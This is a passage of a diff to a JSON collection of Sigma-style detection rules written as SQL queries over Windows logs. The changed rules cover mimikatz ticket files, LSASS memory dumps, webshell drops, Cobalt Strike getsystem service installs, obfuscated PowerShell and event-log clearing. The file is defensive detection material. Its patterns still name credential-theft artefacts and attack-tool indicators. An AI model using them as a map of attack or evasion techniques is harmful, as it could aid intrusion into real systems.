TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "Anydesk Temporary Artefact", - "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "title": "Remote Task Creation via ATSVC Named Pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_anydesk_artefact.yml" + "filename": "win_security_atsvc_task.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Very unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "Installation of TeamViewer Desktop", - "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "TeamViewer_Desktop.exe is create during install", - "author": "frack113", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_install_teamviewer_desktop.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", - "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "status": "test", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.execution", - "cve.2021.44077" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Suspicious PROCEXP152.sys File Created In TMP", - "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "Suspicious PFX File Creation", - "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "title": "Failed Logon From Public IP", + "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "status": "test", - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" ], "falsepositives": [ - "System administrators managing certififcates." + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" ], - "filename": "file_event_win_susp_pfx_file_creation.yml" + "filename": "win_security_susp_failed_logon_source.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", - "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], + "title": "Device Installation Blocked", + "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "status": "experimental", + "description": "Detects an installation of a device that is forbidden by the system policy", + "author": "frack113", "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_device_installation_blocked.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", - "status": "test", - "description": "Detects the creation of a macro file for Outlook.", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", - "id": "15904280-565c-4b73-9303-3291f964e7f9", - "status": "experimental", - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_persistence_error_handler_cmd.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Creation In User Word Startup Folder", - "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", + "title": "SCM Database Handle Failure", + "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", "status": "experimental", - "description": "Detects the creation of an file in user Word Startup", - "author": "frack113", + "description": "Detects non-system users failing to get a handle of the SCM database.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.discovery", + "attack.t1010" ], "falsepositives": [ - "Addition of legitimate plugins" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" ], - "filename": "file_event_win_office_winword_startup.yml" + "filename": "win_security_scm_database_handle_failure.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - 